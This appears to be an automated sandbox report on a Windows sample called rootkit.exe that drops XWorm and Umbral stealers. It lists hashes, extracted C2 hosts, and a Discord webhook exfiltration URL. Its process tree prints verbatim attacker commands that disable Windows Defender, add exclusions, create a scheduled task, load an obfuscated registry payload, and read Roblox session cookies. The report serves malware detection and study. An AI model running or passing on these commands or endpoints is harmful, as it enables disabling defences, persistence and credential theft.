Analysis
-
max time kernel
150s -
max time network
95s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
08-07-2024 17:48
Static task
static1
Behavioral task
behavioral1
Sample
rootkit.exe
Resource
win7-20240705-en
General
-
Target
rootkit.exe
-
Size
274KB
-
MD5
87119ce97d460721e8c6cb98f990c780
-
SHA1
eac69d7550546b7812eb5701e82e079ff780d93a
-
SHA256
f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
-
SHA512
fce0177ad8df7622692919ff8493a9194b806774ca8508a4d28414d75e400bdf26b41818f12ad61a15a0860611d0d978d74660b970b9738c3d2b651e25290fcb
-
SSDEEP
6144:WZL665pSvWs4dNwLIdh+JR5d3fFbeT8UumB2p3H1s93LZG9B:WlKWtnvKR51fy8VZKTo
Malware Config
Extracted
xworm
5.0
127.0.0.1:49403
quotes-suites.gl.at.ply:49403
quotes-suites.gl.at.ply.gg:49403
25nhnSSJeo8OHnH7
-
Install_directory
%AppData%
-
install_file
XClient.exe
Extracted
umbral
https://discord.com/api/webhooks/1259895160632905769/Nt8uggl0mEBvysXT-BFIchzGoOqiC8hi2bWhb_ujCX5_THJiU5kiutfTRZpNtRkHK8Jq
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0034000000016f9f-15.dat family_umbral behavioral1/memory/2356-16-0x0000000000BC0000-0x0000000000C00000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000012117-11.dat family_xworm behavioral1/memory/2904-12-0x0000000001340000-0x0000000001350000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2256 created 432 2256 powershell.EXE 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2576 powershell.exe 2928 powershell.exe 1380 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Modify.exe -
Executes dropped EXE 3 IoCs
pid Process 2904 www.DeadSecObbbfuscation.exe 2356 Modify.exe 2324 www.DeadSec0000000000-obfusecator.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" rootkit.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2256 set thread context of 1744 2256 powershell.EXE 47 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0f6bb145fd1da01 powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2992 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2576 powershell.exe 2928 powershell.exe 1724 powershell.exe 2256 powershell.EXE 1064 powershell.exe 2256 powershell.EXE 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1744 dllhost.exe 1380 powershell.exe 2520 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1232 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2904 www.DeadSecObbbfuscation.exe Token: SeDebugPrivilege 2576 powershell.exe Token: SeDebugPrivilege 2356 Modify.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeDebugPrivilege 2256 powershell.EXE Token: SeDebugPrivilege 1064 powershell.exe Token: SeDebugPrivilege 2256 powershell.EXE Token: SeDebugPrivilege 1744 dllhost.exe Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeDebugPrivilege 2972 taskmgr.exe Token: SeAuditPrivilege 840 svchost.exe -
Suspicious use of FindShellTrayWindow 13 IoCs
pid Process 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe 2972 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2700 wrote to memory of 2904 2700 rootkit.exe 30 PID 2700 wrote to memory of 2904 2700 rootkit.exe 30 PID 2700 wrote to memory of 2904 2700 rootkit.exe 30 PID 2700 wrote to memory of 2356 2700 rootkit.exe 31 PID 2700 wrote to memory of 2356 2700 rootkit.exe 31 PID 2700 wrote to memory of 2356 2700 rootkit.exe 31 PID 2700 wrote to memory of 2576 2700 rootkit.exe 32 PID 2700 wrote to memory of 2576 2700 rootkit.exe 32 PID 2700 wrote to memory of 2576 2700 rootkit.exe 32 PID 2700 wrote to memory of 2992 2700 rootkit.exe 34 PID 2700 wrote to memory of 2992 2700 rootkit.exe 34 PID 2700 wrote to memory of 2992 2700 rootkit.exe 34 PID 2356 wrote to memory of 2928 2356 Modify.exe 36 PID 2356 wrote to memory of 2928 2356 Modify.exe 36 PID 2356 wrote to memory of 2928 2356 Modify.exe 36 PID 2700 wrote to memory of 2324 2700 rootkit.exe 38 PID 2700 wrote to memory of 2324 2700 rootkit.exe 38 PID 2700 wrote to memory of 2324 2700 rootkit.exe 38 PID 2700 wrote to memory of 2324 2700 rootkit.exe 38 PID 2356 wrote to memory of 1724 2356 Modify.exe 40 PID 2356 wrote to memory of 1724 2356 Modify.exe 40 PID 2356 wrote to memory of 1724 2356 Modify.exe 40 PID 1696 wrote to memory of 2256 1696 taskeng.exe 42 PID 1696 wrote to memory of 2256 1696 taskeng.exe 42 PID 1696 wrote to memory of 2256 1696 taskeng.exe 42 PID 2356 wrote to memory of 1064 2356 Modify.exe 45 PID 2356 wrote to memory of 1064 2356 Modify.exe 45 PID 2356 wrote to memory of 1064 2356 Modify.exe 45 PID 2256 wrote to memory of 1744 2256 powershell.EXE 47 PID 2256 wrote to memory of 1744 2256 powershell.EXE 47 PID 2256 wrote to memory of 1744 2256 powershell.EXE 47 PID 2256 wrote to memory of 1744 2256 powershell.EXE 47 PID 2256 wrote to memory of 1744 2256 powershell.EXE 47 PID 2256 wrote to memory of 1744 2256 powershell.EXE 47 PID 2256 wrote to memory of 1744 2256 powershell.EXE 47 PID 2256 wrote to memory of 1744 2256 powershell.EXE 47 PID 2256 wrote to memory of 1744 2256 powershell.EXE 47 PID 2904 wrote to memory of 1380 2904 www.DeadSecObbbfuscation.exe 48 PID 2904 wrote to memory of 1380 2904 www.DeadSecObbbfuscation.exe 48 PID 2904 wrote to memory of 1380 2904 www.DeadSecObbbfuscation.exe 48 PID 1744 wrote to memory of 432 1744 dllhost.exe 5 PID 1744 wrote to memory of 476 1744 dllhost.exe 6 PID 1744 wrote to memory of 488 1744 dllhost.exe 7 PID 1744 wrote to memory of 496 1744 dllhost.exe 8 PID 2356 wrote to memory of 2520 2356 Modify.exe 50 PID 2356 wrote to memory of 2520 2356 Modify.exe 50 PID 2356 wrote to memory of 2520 2356 Modify.exe 50 PID 1744 wrote to memory of 604 1744 dllhost.exe 9 PID 1744 wrote to memory of 680 1744 dllhost.exe 10 PID 1744 wrote to memory of 752 1744 dllhost.exe 11 PID 1744 wrote to memory of 812 1744 dllhost.exe 12 PID 1744 wrote to memory of 840 1744 dllhost.exe 13 PID 1744 wrote to memory of 964 1744 dllhost.exe 15 PID 1744 wrote to memory of 108 1744 dllhost.exe 16 PID 1744 wrote to memory of 1016 1744 dllhost.exe 17 PID 1744 wrote to memory of 1036 1744 dllhost.exe 18 PID 1744 wrote to memory of 1108 1744 dllhost.exe 19 PID 1744 wrote to memory of 1172 1744 dllhost.exe 20 PID 1744 wrote to memory of 1232 1744 dllhost.exe 21 PID 1744 wrote to memory of 1288 1744 dllhost.exe 23 PID 1744 wrote to memory of 1628 1744 dllhost.exe 24 PID 1744 wrote to memory of 620 1744 dllhost.exe 25 PID 1744 wrote to memory of 2740 1744 dllhost.exe 26 PID 1744 wrote to memory of 2868 1744 dllhost.exe 27 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d15b2779-7884-4cbb-a64a-f2b5142ac124}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:604
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1288
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:620
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:2056
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:680
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:752
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:812
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1172
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:840 -
C:\Windows\system32\taskeng.exetaskeng.exe {993F2002-18FA-436D-B11F-81CE7F5E0440} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](119)+'w'+'w'+''+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:964
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:108
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1016
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1036
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1108
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1628
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2740
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2868
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1232 -
C:\Users\Admin\AppData\Local\Temp\rootkit.exe"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\Modify.exe"C:\Users\Admin\AppData\Local\Temp\Modify.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2992
-
-
C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"3⤵
- Executes dropped EXE
PID:2324
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2972
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
164KB
MD522d120454dd38d7f1a3f1cd0eb497f95
SHA14c11a082bf8e64b21310b959821a9f7324aa8107
SHA2566fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA5121552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9
-
Filesize
229KB
MD59259d8aef8f52e8ff4fa082c0074c9b0
SHA188abb68a5632812be3c18e0c740e3818d9501b3e
SHA25645d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA5129cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede
-
Filesize
42KB
MD5737b2d60dc5d475685b65f5c288e00c0
SHA1144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA25669c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA51296a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b0a17851316b39d3872d89ba00a56cfe
SHA1cad7bb3fd0701a969451d979fd6325383ec0caf0
SHA256e999f4104aae26d0f7bd9c088db3e36dc0413b554bdd39ac3ad2006f5cc50a1e
SHA51254af72d60dcecf61889d51ec8b11d242b05ed0674dccc17234b058036ecdccd17483f24f51e98a5573fa86663137b1cb0372227687d42941da224fe328820d6d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD526ebfd1c75ffead44f160c4a5e73d96e
SHA18d0a378aefa87d4c2fd4a1ea24e553789be1f02d
SHA2568e37b54f1de33de46256a947db93ddbcce64760b44f0ff73e2e73bd6aa4ad885
SHA5122fc75e4180d55119ef3ff3301fd085b595975fb7b1ed579e50f3b024deff7fa2e6e191732995a837e88339d7e66eeaa48a5ab774c68ac4235fe065be85cd0bb3